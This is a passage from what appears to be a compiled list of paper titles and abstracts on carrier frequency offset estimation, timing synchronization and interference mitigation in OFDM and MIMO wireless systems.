EKF in convergence rate and consistency. --- paper_title: A Compact Preamble Design for Synchronization in Distributed MIMO OFDM Systems paper_content: In distributed multiple input multiple output (MIMO) orthogonal frequency division multiplexing (OFDM) systems, signals arrive at the receiver on different timing and are characterized by distinct carrier frequency offsets (CFOs), which makes synchronization rather challenging than that associated with centralized MIMO systems. Current solutions to this problem are mainly based on special preamble designs, where different training sequences are cascaded and then separately used to assist timing synchronization and CFO estimation. Such preamble designs not only increase system overhead but also burden the receivers with independent algorithms for timing synchronization and CFO estimation. In this paper, we propose a low-overhead (compact) preamble having the same length as one OFDM symbol, along with a unified algorithm for both timing synchronization and CFO estimation. Furthermore, the CFO estimation range can be flexibly extended to cope with larger CFOs in the proposed approach. Under the same training overhead and power consumption, simulation results indicate that the proposed approach outperforms a timing synchronization scheme that based on unequal period synchronization patterns. --- paper_title: Improved schemes for tracking residual frequency offset in DVB-T systems paper_content: Carrier frequency offset (CFO) synchronization is a crucial issue in the implementation of orthogonal frequency division multiplexing (OFDM) systems. Synchronization is performed in two stages: acquisition and tracking. After a first estimation and correction of the CFO performed in the acquisition stage, there still remains a residual frequency offset (RFO) due to real system conditions. This paper presents two new schemes for RFO tracking affecting a digital video broadcasting (DVB-T) system. Due to the nature of DVB-T, where data transmission is performed continuously, RFO tracking needs to be performed accurately during all the data length in order to correct the ICI and the phase rotation impairment produced by this RFO. Comparisons of the novel algorithms with two previously reported estimators in terms of mean square error (MSE), complexity and speed of convergence are performed. The proposed schemes improve performance and/or speed of convergence compared to the conventional estimators with a reduction of the computational complexity. Furthermore, a combined technique for RFO tracking involving the two new schemes is proposed. This method obtains the best results in terms of accuracy, convergence and complexity. --- paper_title: Semi-blind MIMO OFDM systems with precoding aided CFO estimation and ICA based equalization paper_content: We propose a semi-blind multiple-input multiple-output (MIMO) orthogonal frequency division multiplexing (OFDM) system, with a precoding aided carrier frequency offset (CFO) estimation approach, and an independent component analysis (ICA) based equalization structure. A number of reference data sequences are carefully designed offline and are superimposed to source data via a non-redundant linear precoding process, which can kill two birds with one stone, without introducing any extra total transmit power and spectral overhead. First, the reference data sequences are selected from a pool of carefully designed orthogonal sequences. The CFO estimation is to minimize the sum cross-correlation between the CFO compensated signals and the rest orthogonal sequences in the pool. Second, the same reference data enable elimination of the permutation and quadrant ambiguity in the ICA equalized signals by maximizing the cross-correlation between the ICA equalized signals and the reference data. Simulation results show that, without extra bandwidth and power needed, the proposed semi-blind system achieves a bit error rate (BER) performance close to the ideal case with perfect channel state information (CSI) and no CFO. Also, the precoding aided CFO estimation outperforms the constant amplitude zero autocorrelation (CAZAC) sequences based CFO estimation approach, with no spectral overhead. --- paper_title: A Novel Timing Synchronization Method for OFDM Systems paper_content: In this letter, a novel timing offset estimation method is presented for orthogonal frequency division multiplexing (OFDM) systems. The proposed method is developed on the basis of the cyclic structure of OFDM symbol and uses a new noise subspace based metric to estimate the timing offset. Simulation results show that the proposed method has a significantly higher probability of correct estimation of the timing offset than the other methods in multipath channels. --- paper_title: Blind Estimation of OFDM Parameters in Cognitive Radio Networks paper_content: This paper presents a blind parameter estimation algorithm for orthogonal frequency division multiplexing (OFDM) signal affected by a time-dispersive channel, timing offset, carrier frequency offset and additive Gaussian noise. Unlike the previous studies, this paper presents the second-order cyclostationarity of OFDM signal considering the effect of time-dispersive channel. The cyclostationarity properties of received OFDM signal in time-dispersive channel is exploited to estimate the OFDM parameters. These parameters includes OFDM symbol period, useful symbol period, cyclic prefix factor, number of subcarriers and carrier frequency offset. Simulations are performed to investigate the performance of OFDM parameter estimation algorithm in diverse channel conditions. --- paper_title: Highly Accurate Blind Carrier Frequency Offset Estimator for Mobile OFDM Systems paper_content: For orthogonal frequency division multiplexing (OFDM) communication systems, the orthogonality among subcarriers is lost in mobile applications due to frequency offset resulting from either transmitter-receiver local oscillator differences or Doppler shift caused by mobility. As a direct result, inter-carrier interference (ICI) is observed on each and every subcarrier, leading to significant performance degradation. There are a lot of OFDM carrier frequency offset (CFO) estimation schemes classified as data aided estimation and blind estimation. Due to the system power and high bandwidth efficiencies, blind estimators have received a lot of attention recently. Many blind CFO schemes were proposed for OFDM systems, some of which are based on power spectrum smoothing, kurtosis-type cost functions and minimum output variance. In this paper, we propose a novel blind CFO estimator based on Minimum Reconstruction Error (MRE). In contrast to other blind CFO estimators, the proposed technique can be used for any constellation schemes, does not require a large number of blocks to reach acceptable estimation error and provides reliable estimation performance with very low mean square error (MSE). Simulation results in AWGN and multi-path fading channels confirm that performance of the proposed highly accurate blind CFO estimator is superior when frequency offset or time variation occurs in the channel - the proposed technique outperforms most existing blind CFO estimation methods. --- paper_title: Frequency synchronization and phase offset tracking in a real-time 60-GHz CS-OFDM MIMO system paper_content: The performance of an Orthogonal Frequency-Division-Multiplexing (OFDM)-based 60-GHz system can be strongly degraded due to carrier frequency impairment and Phase Noise (PN). In this paper we present a practical approach to the design of a frequency synchronization and phase offset tracking scheme for a 60-GHz, Non-Line-of-Sight (NLOS) capable wireless communication system. We first analyse the architecture of the 60-GHz system and propose a simple algorithm for Carrier Frequency Offset (CFO) estimation on the basis of numerical investigations. Then, we explore pilot based and blind tracking methods for mitigation of Residual Frequency Offset (RFO) and Common Phase Error (CPE). Provided are also analysis and implementation results on an Altera Startix III FPGA. --- paper_title: Pilot-Aided Carrier Frequency Estimation for Filter-Bank Multicarrier Wireless Communications on Doubly-Selective Channels paper_content: Multicarrier modulation techniques are currently the key technology in the area of high-data-rate transmission over wireless fading channels. Their considerable vulnerability to carrier frequency offsets, however, hinders their appealing features and demands adequate countermeasures. This paper contributes with a class of frequency estimation algorithms intended for filter bank burst-mode multicarrier transmission over time-frequency selective fading channels. All algorithms are derived from the maximum likelihood principle, exhibit a feedforward structure and are based on the use of pilot symbols scattered throughout the burst. The accuracy of the proposed schemes is investigated in typical mobile wireless scenarios, showing that they outperform maximum likelihood non-data-aided frequency recovery in spite of a substantially lower computational requirement. --- paper_title: Linear Least Squares CFO Estimation and Kalman Filtering Based I/Q Imbalance Compensation in MIMO SC-FDE Systems paper_content: This paper investigates carrier frequency offset (CFO) estimation and inphase/quadrature (I/Q) imbalance compensation in time-varying frequency-selective channels. We first propose a linear least squares (LLS) CFO estimation approach which has a lower complexity and a higher accuracy than the previous nonlinear CFO estimation methods. We then propose a Kalman filtering based I/Q imbalance compensation approach in the presence of CFO, which demonstrates a good ability to track the channel time variations with a fast convergence speed, by nulling the cyclic prefix (CP) and including the CFO in the state vector of the equivalent channel model. The proposed Kalman filtering based I/Q imbalance compensation approach with associated equalization tracks the time variation with a fast convergence speed. Simulation results show that the proposed compensation approach for CFO and I/Q imbalance provides a bit error rate (BER) performance close to the ideal case with perfect channel state information (CSI), no CFO and no I/Q imbalance. --- paper_title: Reduced-complexity baseband compensation of joint Tx/Rx I/Q imbalance in mobile MIMO-OFDM paper_content: Direct-conversion multiple-input multiple-output orthogonal frequency division multiplexing (MIMO-OFDM) transceivers enjoy high data rates and reliability at practical implementation complexity. However, analog front-end impairments such as I/Q imbalance and high mobility requirements of next-generation broadband wireless standards result in performance-limiting inter-carrier interference (ICI). In this paper, we study the effects of ICI due to these impairments for OFDM with space frequency block codes and spatial multiplexing, derive a generalized linear model and propose a non-iterative reduced-complexity digital baseband joint compensation scheme. Furthermore, we present a pilot scheme for joint estimation of the channel and the I/Q imbalance parameters and evaluate its performance through simulations. Our proposed scheme is effective in estimating and compensating for frequency-independent and frequency-dependent transmit and receive I/Q imbalances even in the presence of a residual frequency offset. --- paper_title: Training-Based Synchronization and Demodulation With Low Complexity for UWB Signals paper_content: In this paper, we propose a low-complexity data-aided (DA) synchronization and efficient demodulation technique for an ultrawideband (UWB) impulse radio system. Depending on the autocorrelation property of a judiciously chosen training sequence, a redundance-included demodulation template (RDT) can be extracted from the received signal by separating, shifting, and realigning two connected portions in the observation window. After constructing the RDT, two receiver designs are available. One approach is to demodulate transmitted symbols by correlating the RDT in a straightforward manner, which does not require the explicit timing acquisition and, thus, considerably reduces the complexity of the receiver. An alternative approach is accomplished with the assistance of a non-RDT (NRDT). The NRDT-based receiver is able to remove the redundant noisy component of the RDT by acquiring timing offset via a simple synchronization scheme, therefore achieving a better bit error rate (BER) performance. Both the schemes can counteract the effects of interframe interference (IFI) and unknown multipath channels. Furthermore, analytical performance evaluations of the RDT- and NRDT-based receivers are provided. Simulations verify the realistic performance of the proposed receivers in the presence of multiuser interference (MUI) and timing errors. --- paper_title: BER analysis of direct conversion OFDM systems with MRC under channel estimation errors paper_content: In this letter, we calculate an exact closed-form expression for the bit error rate (BER) of orthogonal frequency division multiplexing (OFDM) systems with direct conversion that employ maximal ratio combining (MRC) reception in multipath Rayleigh fading channels, using binary phase-shitf keying (BPSK) modulation. We assume a realistic system model where direct current (DC) offset, carrier frequency offset (CFO) and imperfect channel state information (ICSI) are simultaneously considered. Results show the appearance of an irreducible BER floor due to DC offset and ICSI. As a rule of thumb, we provide a simple expression for the maximum DC offset allowable in a direct conversion receiver. --- paper_title: Cluster-Based Differential Energy Detection for Spectrum Sensing in Multi-Carrier Systems paper_content: This paper presents a novel differential energy detection scheme for multi-carrier systems, which can form fast and reliable decision of spectrum availability even in very low signal-to-noise ratio (SNR) environment. For example, the proposed scheme can reach 90% in probability of detection (PD) and 10% in probability of false alarm (PFA) for the SNRs as low as -21 dB, while the observation length is equivalent to 2 multi-carrier symbol duration. The underlying initiative of the proposed scheme is applying order statistics on the clustered differential energy-spectral-density (ESD) in order to exploit the channel frequency diversity inherent in high data-rate communications. Specifically, to enjoy a good frequency diversity, the clustering operation is utilized to group uncorrelated subcarriers, while, the differential operation applied onto each cluster can effectively remove the noise floor and consequently overcome the impact of noise uncertainty while exploiting the frequency diversity. More importantly, the proposed scheme is designed to allow robustness in terms of both, time and frequency offsets. In order to analytically evaluate the proposed scheme, PFA and PD for Rayleigh fading channel are derived. The closed-form expressions show a clear relationship between the sensing performance and the cluster size, which is an indicator of the diversity gain. Moreover, we are able to observe up to 10 dB gain in the performance compared to the state-of-the-art spectrum sensing schemes. --- paper_title: Iterative Receiver Design With Joint Doubly Selective Channel and CFO Estimation for Coded MIMO-OFDM Transmissions paper_content: This paper is concerned with the problem of turbo (iterative) processing for joint channel and carrier frequency offset (CFO) estimation and soft decoding in coded multiple-input-multiple-output (MIMO) orthogonal frequency-division-multiplexing (OFDM) systems over time- and frequency-selective (doubly selective) channels. In doubly selective channel modeling, a basis expansion model (BEM) is deployed as a fitting parametric model to reduce the number of channel parameters to be estimated. Under pilot-aided Bayesian estimation, CFO and BEM coefficients are treated as random variables to be estimated by the maximum a posteriori technique. To attain better estimation performance without sacrificing spectral efficiency, soft bit information from a soft-input-soft-output (SISO) decoder is exploited in computing soft estimates of data symbols to function as pilots. These additional pilot signals, together with the original signals, can help to enhance the accuracy of channel and CFO estimates for the next iteration of SISO decoding. The resulting turbo estimation and decoding performance is enhanced in a progressive manner by benefiting from the iterative extrinsic information exchange in the receiver. Both extrinsic information transfer chart analysis and numerical results show that the iterative receiver performance is able to converge fast and close to the ideal performance using perfect CFO and channel estimates. --- paper_title: Carrier frequency offset tracking for constant modulus signalling-based orthogonal frequency division multiplexing systems paper_content: This study presents a blind carrier frequency offset (CFO) tracking algorithm for orthogonal frequency division multiplexing systems with constant modulus signalling. Both single-input single-output and multiple-input multiple-output (MIMO) systems are considered. Based on the assumption that the channel frequency response (CFR) has been estimated by training symbols and keeps constant over one frame duration, we discover that the CFO can be estimated via minimising the power difference between the received signals and the CFR. The polynomial rooting method is exploited to derive a low complexity solution. The expectation and mean-square error of the proposed method are derived mathematically. Besides, the effect of channel estimation error on the performance of CFO tracking is addressed and it is shown that the proposed algorithm is robust to this error. At last, this blind scheme can be applied to a MIMO system with the aid of space time block codes. --- paper_title: Frame detection and timing acquisition for OFDM transmissions with unknown interference paper_content: Frame detection and timing acquisition are challenging tasks in orthogonal frequency-division multiplexing systems plagued by narrowband interference (NBI). Most existing solutions operate in the time domain by exploiting the repetitive structure of a training symbol and suffer from considerable performance loss in the presence of NBI. In this work, a novel solution in which frame detection is accomplished in the frequency domain on the basis of a suitable likelihood ratio test is presented. In order to increase the resilience to NBI, the interference power is treated as a nuisance parameter that is averaged out from the corresponding likelihood functions. The resulting test statistic depends on the fractional carrier frequency offset (CFO), which is easily estimated. An alternative scheme that dispenses from CFO estimation is also proposed. After frame detection, the test statistic is employed as a timing metric to accurately locate the position of the training symbol within the received data stream. Computer simulations indicate that the proposed solutions are remarkably robust to NBI and outperform existing alternatives in a severe interference scenario. The price for this advantage is a substantial increase in the computational burden. --- paper_title: Autocorrelation Based Coarse Timing with Differential Normalization paper_content: Two novel differential normalization factors, depending on the severity of carrier frequency offset, are proposed for autocorrelation based coarse timing scheme. Compared with the conventional normalization factor based on signal energy, they improve the robustness of the timing metric to signal-to-noise ratio (SNR), improve the mainlobe sharpness of the timing metric and reduce both missed detection and false alarm probabilities. --- paper_title: A Cooperative Scheme for ZP-OFDM with Multiple Carrier Frequency Offsets over Multipath Channel paper_content: In the cooperative communication system, due to the distributed nature of the relay system, multiple carrier frequency offsets (CFOs) at different relays and multipath channels between relays cause the whole cooperative communication channel to be a doubly time-frequency selective channel. Zero-Padding Orthogonal Frequency Division Multiplexing (ZP-OFDM), which has been adopted for some wideband communication standards and applications, possesses a unique linear structure. In this paper, we use a cooperative tall Toeplitz scheme to achieve the full cooperative and multipath diversity, and combat the CFOs simultaneously. Importantly, this full diversity scheme only requires linear equalizers (LEs), such as zero-forcing (ZF) and minimum mean square error (MMSE) receivers, an issue which reduces the system complexity. Theoretical analysis of the proposed cooperative tall Toeplitz scheme is provided based on the analytical upper bound of the channel orthogonality deficiency derived in this paper. The above mentioned theoretical issues are verified by the simulation results as well. --- paper_title: Cyclostationarity-Based Robust Algorithms for QAM Signal Identification paper_content: This letter proposes two novel algorithms for the identification of quadrature amplitude modulation (QAM) signals. The cyclostationarity-based features used by these algorithms are robust with respect to timing, phase, and frequency offsets, and phase noise. Based on theoretical analysis and simulations, the identification performance of the proposed algorithms compares favorably with that of alternative approaches. --- paper_title: An Efficient Time Synchronization Scheme for Broadband Two-Way Relaying Networks Based on Physical-Layer Network Coding paper_content: We present an efficient time synchronization scheme for broadband two-way relaying networks based on two-phase physical layer network coding. Especially, a preamble structure is proposed in this letter for the synchronization. The synchronization approach exploits the preamble in frequency domain and time domain to effectively separate the mixed signals, and jointly estimate timing-offsets and channel parameters, respectively. Numerical results confirm that the suggested method is superior to the conventional scheme, and is very suitable for the synchronization in broadband two-way relaying networks based on two-phase physical layer network coding. --- paper_title: Jamming Rejection Using FFH/MFSK ML Receiver Over Fading Channels With the Presence of Timing and Frequency Offsets paper_content: The composite effect of hostile multitone jamming and partial-band noise jamming on bit-error rate (BER) performance of a fast frequency-hopped M-ary frequency-shift-keying system is studied over Rayleigh fading channels in the presence of timing and frequency offsets. The maximum-likelihood (ML) diversity-combining method is employed to improve BER performance of the system. Analytical BER expression of the proposed ML receiver is derived. The analytical results, validated by computer simulation, show that the proposed ML receiver can suppress the composite hostile jamming more effectively than some existing conventional diversity-combining receivers. The ML receiver is also found to be robust against inaccurate estimation of the required side information. --- paper_title: Timing-delay and frequency-offset estimations for initial synchronisation on time-varying Rayleigh fading channels paper_content: A technique for timing-delay and frequency-offset estimations that takes advantage of a single dual-chirp preamble burst operating in frequency-non-selective fading environments is proposed. As the shape of the autocorrelation function of the dual-chirp signal does not essentially change by different values of frequency offset, the proposed technique provides a maximum-likelihood (ML) timing-delay estimation by exploiting only one pair of pseudo-noise matched filters (PN MFs), instead of conventionally exploiting a continuum of MFs, therefore approaching the Miller-Chang bound (MCB) in the timing-delay estimation with a channel gain and an initial phase error as nuisance parameters. Using the transform invariance property of the dual-chirp signal, the proposed technique estimates a frequency offset by exploiting frequency-domain PN MFs, therefore approaching the MCB in the frequency-offset estimation. The proposed technique accomplishes ML timing-delay and frequency-offset estimations to attain the performance bounds. The advantages of the proposed technique are verified by rigorous statistical analysis in conjunction with comprehensive computer simulations. --- paper_title: One-Shot Blind CFO and Channel Estimation for OFDM With Multi-Antenna Receiver paper_content: In this paper, we design a new blind joint carrier frequency offset (CFO) and channel estimation method for orthogonal frequency-division multiplexing (OFDM) with multiantenna receiver. The proposed algorithm requires only one received OFDM block and thus belongs to the category of one-shot estimation methods. Other advantages of the proposed algorithm include 1) it supports fully loaded data carriers and is thus spectral efficient; 2) the channel from the transmitter to each receive antenna can be blindly estimated with only a scaling ambiguity; and 3) the algorithms outperforms the existing methods. Moreover, we derive the Cramer-Rao Bounds (CRB) of joint CFO and channel estimation in closed forms. Numeral results not only show the effectiveness of the proposed algorithm but also demonstrate its closed performance to CRB. --- paper_title: Robust Timing and Frequency Synchronization for OFDM Systems paper_content: This paper deals with timing and frequency synchronization in orthogonal frequency-division multiplexing (OFDM) systems. A robust multistage scheme that works in the time domain, independent of the preamble structure, is proposed. After coarse-timing estimation, joint timing and integer frequency synchronization is performed. Then, fractional frequency correction is carried out, and finally, fine-timing estimation completes the synchronization process. The new timing estimation method is flexible and can be adjusted according to the degree of channel distortion. Furthermore, frequency synchronization is efficiently accomplished with an estimation range that is as large as the bandwidth of the OFDM signal. The performance of the proposed method is evaluated in terms of the mean square error. The results indicate that the new method significantly improves performance compared with the previous methods. --- paper_title: Blind Carrier Frequency Offset Estimation for OFDM Systems with Constant Modulus Constellations paper_content: This paper proposes a blind carrier frequency offset (CFO) estimation scheme for OFDM systems. In the proposed scheme, the covariance matrix of the received signal is obtained through the circular shifts of OFDM blocks in the time-domain. From the fact that the covariance matrix has a banded structure in the absence of CFO, we estimate CFO through minimizing the powers of the elements that are outside the band. We show that the proposed scheme is better than the conventional schemes through simulations. --- paper_title: Fast Kalman Equalization for Time-Frequency Asynchronous Cooperative Relay Networks With Distributed Space-Time Codes paper_content: Cooperative relay networks are inherently time and frequency asynchronous due to their distributed nature. In this correspondence, we propose a transceiver scheme to combat both time and frequency offsets for cooperative relay networks with multiple relay nodes. At the relay nodes, a distributed linear convolutive space-time coding is adopted, which has the following advantages: 1) Full cooperative diversity can be achieved using a minimum mean square error (MMSE) or MMSE decision feedback equalizer (MMSE-DFE) detector, instead of a maximum-likelihood receiver when only time asynchronism exists. 2) The resultant equivalent channel possesses some special structure, which can be exploited to reduce the equalization complexity at the destination node. By taking full advantage of such a special structure, fast Kalman equalizations based on linear MMSE and MMSE-DFE are proposed for the receiver, where the estimation of the state vector (information symbols) can be recursively taken and become very computationally efficient, compared with direct equalization. The proposed scheme can achieve considerable diversity gain with both time and frequency offsets and applies to frequency-selective fading channels. --- paper_title: Space–Frequency Convolutional Coding for Frequency-Asynchronous AF Relay Networks paper_content: In this paper, we design a space-frequency (SF) convolutional coding scheme for amplify-and-forward (AF) relay networks that contain multiple distributed relay nodes. The frequency-asynchronous nature of the distributed system is considered in our design. Orthogonal frequency-division multiplexing (OFDM) modulation is adopted, which is robust to certain timing errors. We exploit the signal space diversity technique and employ an extended cyclic prefix (CP) at the source node. The relay nodes need to perform only simple operations, e.g., convolution and amplification, and they need no information about the channels and the frequency offsets. Attributed to the extended CP, the multiple frequency offsets can directly be compensated at the destination. We further prove that both spatial and multipath diversity can be achieved by the proposed scheme. Numerical results are provided to corroborate the proposed studies. --- paper_title: Improved CIR-Based Receiver Design for DVB-T2 System in Large Delay Spread Channels: Synchronization and Equalization paper_content: This paper proposes to implement an improved orthogonal frequency division multiplexing (OFDM) receiver by utilizing a channel impulse response (CIR)-based synchronization and sparse equalization for DVB-T2 system operating in both the single-input single-output (SISO) and multi-input single-output (MISO) transmission modes. First, the proposed OFDM receiver performs a pilot-aided CIR estimation after a coarse symbol timing recovery (STR). Then, the proposed CIR-based fine STR compensates for a false symbol timing offset (STO). In particular, the fine STR resolves an ambiguity effect of CIR, which is the main problem caused by a false coarse STO in exploiting the CIR. Upon the completion of the fine synchronization, the proposed CIR-based sparse equalization is performed in order to minimize the noise and interference effects by shifting or selecting a basic frequency interpolation (FI) filter according to an echo delay (phase) or maximum delay spread, respectively. Performance evaluations are accomplished in large delay spread channels in which the maximum delay spread is less or longer than a guard interval (GI). It is shown that the proposed receiver is not only capable of estimating the fine STO but also minimizing effectively the noise effects. In particular, the performance gain in a single pre-echo channel being longer than GI is remarkable as compared with a conventional receiver. --- paper_title: MCRB for Timing and Phase Offset for Low-Rate Optical Communication with Self-Phase Modulation paper_content: We derive the modified Cramer-Rao bound (MCRB) for symbol timing and phase offset estimation in the presence of nonlinear self-phase modulation (SPM) in a dispersion compensated long-haul optical fiber link with coherent detection at data rates below 10 Gigabaud. In the presence of a low-pass filter at the receiver front-end, we find that SPM degrades the MCRB. Moreover, depending on the pulse shape, SPM induces underdamped oscillation on the bounds. --- paper_title: Design and Analysis of Data-Aided Coarse Carrier Frequency Recovery in DVB-S2 paper_content: An improved data-aided (DA) frequency error detector (FED) and a frequency lock detector are proposed under large frequency offset for Digital Video Broadcasting Satellite Second Generation (DVB-S2) system. Computer simulations results show that the proposed error detector can increase the frequency acquisition range and decrease the acquisition time without complexity increase. Its closed-loop normalized frequency root mean square error (RMSE) improves at least 1.5 dB compared with that of conventional error detector. The proposed lock detector shows good lock indication. Its modified version can save more symbols to indicate the locking status. --- paper_title: Correction of the CFO in OFDM Relay-Based Space-Time Codes paper_content: In this paper, we analyze the impact of carrier frequency offset (CFO) on the performance of orthogonal frequency division multiplexing (OFDM) transmission employing space-frequency coding over relay channels. The challenge in such systems lies in the difficulty of canceling the interference resulting from the different CFOs that correspond to the relays involved in the transmission. We first analyze the CFO correction schemes and examine their impact on the achievable information rates. Further, we analyze the interference cancellation (IC) technique based on the so-called turbo-principle, that is, which jointly detects and decodes the received data. The increase of the rates achievable thanks to IC is assessed via parametric description of the iterative process. We provide examples that demonstrate the efficacy of the proposed scheme and numerical results are contrasted with theoretical performance limits. --- paper_title: ICI Mitigation for OFDM Using PEKF paper_content: Orthogonal frequency division multiplexing (OFDM) is widely known as the promising broadband wireless communication technology due to the high spectral efficiency and robustness to the multi-path interference. However, the inter-carrier interference (ICI) caused by Doppler frequency offset is an important issue for OFDM in high mobility. In this paper, the method to mitigate ICI for OFDM system is investigated, and a novel ICI mitigation method using planar extended Kalman filter (PEKF) is proposed to reduce the ICI effects. Simulation results demonstrate that the proposed ICI mitigation method in this letter outperforms traditional ICI mitigation methods. --- paper_title: Multiple CFO Mitigation in Amplify-and-Forward Cooperative OFDM Transmission paper_content: In cooperative orthogonal frequency division multiplexing (OFDM) systems, accurate frequency synchronization is critical to achieving any potential gains brought by the cooperative operation. The carrier frequency offsets (CFOs) present among multiple nodes (source, relays and destination) are more difficult to tackle than the single CFO problem in point-to-point systems. Multiple CFOs cause phase drift, inter-carrier interference (ICI) and inter-block interference (IBI) in the received signal. This paper deals with the CFO induced interference mitigation problem in distributed space time block coded (STBC) amplify-and-forward (AF) cooperative OFDM systems. We propose a two step approach to recover the phase distortion and suppress the ICI and IBI using low complexity methods to achieve high performance. The first step is time domain (TD) compensation and the second step is frequency domain (FD) decoding. Two TD compensation schemes are proposed, i.e., IBI-removal and ICI-removal. The IBI-removal scheme decouples the two blocks of one STBC codeword completely and then decodes the ICI degraded blocks individually. The ICI-removal scheme removes ICI first and the subsequent decoding requires joint decoding of the two blocks. Simulation results show that the IBI-removal scheme which is of lower complexity performs well with small CFO. For large CFO, the ICI-removal with modified iterative joint maximum likelihood decoding (MIJMLD) outperforms other schemes. --- paper_title: New joint algorithm of blind doppler parameters estimation for high-order QAM signals paper_content: Aiming at the difficulties of blind doppler parameters estimation for QAM signals in the satellite communication on-the-move (SCOTM) system, a new joint algorithm of blind doppler frequency and doppler-rate estimation based on cyclic-statistical tests and phase difference is proposed. By detecting one of the cyclic frequencies of QAM signals, located at the quartic frequency offset, doppler frequency is effectively estimated, meanwhile, the data division method is exploited to calculate the doppler-rate. Finally, phase lock loop (PLL) is proposed to make the estimation more accurately. All-sided Monte Carlo simulations are employed to confirm the theoretical analysis, simulation results indicate that this algorithm can track time-varying frequency of the QAM signals accurately. --- paper_title: Frequency Offset Invariant Multiple Symbol Differential Detection of MPSK paper_content: Multiple-symbol differential detection (MSDD) of differentially encoded phase-shift keying (PSK) signals in the presence of random frequency variation and additive white Gaussian noise is studied. It is shown that frequency variation distorts the transmitted signal through attenuating its amplitude and introducing a time-varying phase shift to the information symbols. A double differential PSK (DDPSK) modulation scheme is then introduced and a MSDD for detecting DDPSK signals in the presence of frequency offset is proposed. It is shown that the proposed receiver is robust to the distortions caused by the random frequency variation. A lower bound on the error probability of the proposed MSDD receiver is also derived and compared to that of an autocorrelation demodulator for the case where the observation interval approaches infinity. --- paper_title: SNR Estimation in a Non-Coherent BFSK Receiver With a Carrier Frequency Offset paper_content: This correspondence deals with the problem of estimating average signal-to-noise ratio (SNR) for a communication link employing binary frequency shift keying (BFSK) in the presence of a carrier frequency offset (CFO). The transmitted symbols are corrupted by Rayleigh fading and additive white Gaussian noise (AWGN). We treat the CFO as a nuisance parameter and estimate it using a data statistics based estimator. This estimate is then used to design a maximum likelihood (ML) estimator to get the estimates of SNR. We also derive the Cramer-Rao bound (CRB) for the estimators and have shown the performance of both the data-aided and non-data-aided estimators. --- paper_title: Semiblind Iterative Receiver for Coded MIMO-OFDM Systems paper_content: In this paper, a semiblind iterative receiver is proposed for coded multiple-input-multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM) systems. A novel iterative extended soft-recursive least square (IES-RLS) estimator for joint channel and frequency offset estimation is introduced. Extrinsic bit information obtained from the channel decoder and expected symbol decisions obtained from the demodulator are simultaneously exploited by the IES-RLS. The proposed receiver combines the MIMO data demodulator, the proposed channel estimator, and the channel decoder in an iterative manner to yield an improved bit error rate (BER) performance. To arrive at a feasible algorithm, the first-order linearization of the received vector signal with respect to the frequency offset is used in the IES-RLS channel estimator. The BER performance, a constellation-constrained mutual information analysis, and an EXIT chart analysis are used to verify the effectiveness of the proposed receiver. Simulation results show the superiority of the proposed semiblind receiver, compared with conventional semiblind receivers. --- paper_title: Detection of cooperative OFDM signals in time-varying channels with partial whitening of intercarrier interference paper_content: Cooperative communication can yield spatial diversity gains, but its performance can also suffer severely from the multiple carrier frequency offsets (MCFOs) induced by high-speed relative motion, in addition to Doppler spread. In orthogonal frequency-division multiplexing (OFDM) systems, such performance degradation arises as a result of intercarrier interference (ICI). We have shown previously that, in conventional non-cooperative communication, certain ICI components (called residual ICI) display high normalized autocorrelation and a partial whitening of the residual ICI can significantly benefit OFDM signal detection. In this work, we show that similar whitening can also be employed in cooperative communication to address the MCFO issue mentioned above. As an illustration, we simulate a distributed spatial-frequency block coding (SFBC) OFDM system subject to highly disparate MCFOs, where in the receiver we perform partial whitening of the residual ICI followed by maximum-likelihood sequence estimation (MLSE). The results show that the proposed method can comfortably accommodate a maximum MCFO span well exceeding one subcarrier spacing. --- paper_title: Fractional timing offset and channel estimation for MIMO OFDM systems over flat fading channels paper_content: This paper addresses the problem of fractional timing offset and channel estimation in Multiple input Multiple output orthogonal frequency division multiplexing (MIMO OFDM) systems. The estimators have been derived assuming a flat fading channel and using the maximum likelihood criterion. Closed form Cramer Rao bound (CRB) expressions for fractional timing offset and channel response are also derived. Simulation results have been used to cross-check the accuracy of the proposed estimation algorithm. --- paper_title: Maximal power path detection for OFDM timing-advanced synchronization schemes paper_content: Fine timing estimation in timing synchronization scheme of orthogonal frequency division multiplexing systems gives an estimate of symbol starting time index corresponding to the path with maximal power within an interval suggested by coarse timing stage. The actual starting index fed to the following stages is brought forward by an amount that should be adaptive to the estimated index to optimize system performance. In this paper, a method of detecting the estimated starting time index of path with maximal power in channel impulse response is proposed based on conventional preamble with repetitive structure. To deal with the adverse effect of fractional timing offset on the detection metric, we propose a preamble composed of cyclic-shifted parts and the accompanying fine timing and detection scheme. Simulation with time-varying wireless channel shows the detection methods makes use of the time diversity provided by time-varying paths and has good error performance. The scheme with proposed preamble further reduces probability of error detection with the diversity in fractional timing offset provided inherently in the parts of preamble. --- paper_title: A Message Passing Approach to Joint Channel Estimation and Decoding with Carrier Frequency Offset in Time Selective Rayleigh Fading Channel paper_content: This paper presents a message passing approach to joint channel estimation, data detection and decoding over time-selective Rayleigh fading channel with residual carrier frequency offset (CFO). The proposed algorithm utilizes the sum product algorithm (SPA) implemented on a factor graph (FG) representing the joint a posteriori probability distribution of the unknown CFO, information bits and channel coefficients vector given the channel output. A combination of particle filtering and Gaussian parameterization is employed to approximate the exact probability density function in message passing for CFO and channel estimation. Computer simulations demonstrate the effectiveness of the proposed algorithm in combating the CFO over unknown Rayleigh fading channels. --- paper_title: ML Estimation of Timing and Frequency Offsets Using Distinctive Correlation Characteristics of OFDM Signals Over Dispersive Fading Channels paper_content: Orthogonal frequency-division multiplexing (OFDM) is a promising technology for communication systems. However, the synchronization of OFDM over dispersive fading channels remains an important and challenging issue. In this paper, a synchronization algorithm for determining the symbol timing offset and the carrier frequency offset (CFO) in OFDM systems, based on the maximum-likelihood (ML) criterion, is described. The new ML approach considers time-dispersive fading channels and employs distinctive correlation characteristics of the cyclic prefix at each sampling time. The proposed symbol timing estimation is found to be a 2-D function of the symbol timing offset and channel length. When compared with previous ML approaches, the proposed likelihood function is optimized at each sampling time without requiring additional pilot symbols. To practically realize the proposed method, a suboptimum approach to the ML estimation is adopted, and an approximate but closed-form solution is presented. Nonlinear operations of the approximate solution can be implemented using a conventional lookup table to reduce the computational complexity. The proposed CFO estimation is also found to depend on the channel length. Unlike conventional schemes, the proposed method fully utilizes the delay spread of dispersive fading channels (which usually reduces the accuracy of estimations). Furthermore, the Cramer-Rao lower bound (CRLB) on the CFO estimate is analyzed, and simulations confirm the advantages of the proposed estimator. --- paper_title: Joint Frequency-Domain Equalization & Spectrum Combining for the Reception of SC Signals in the Presence of Timing Offset paper_content: 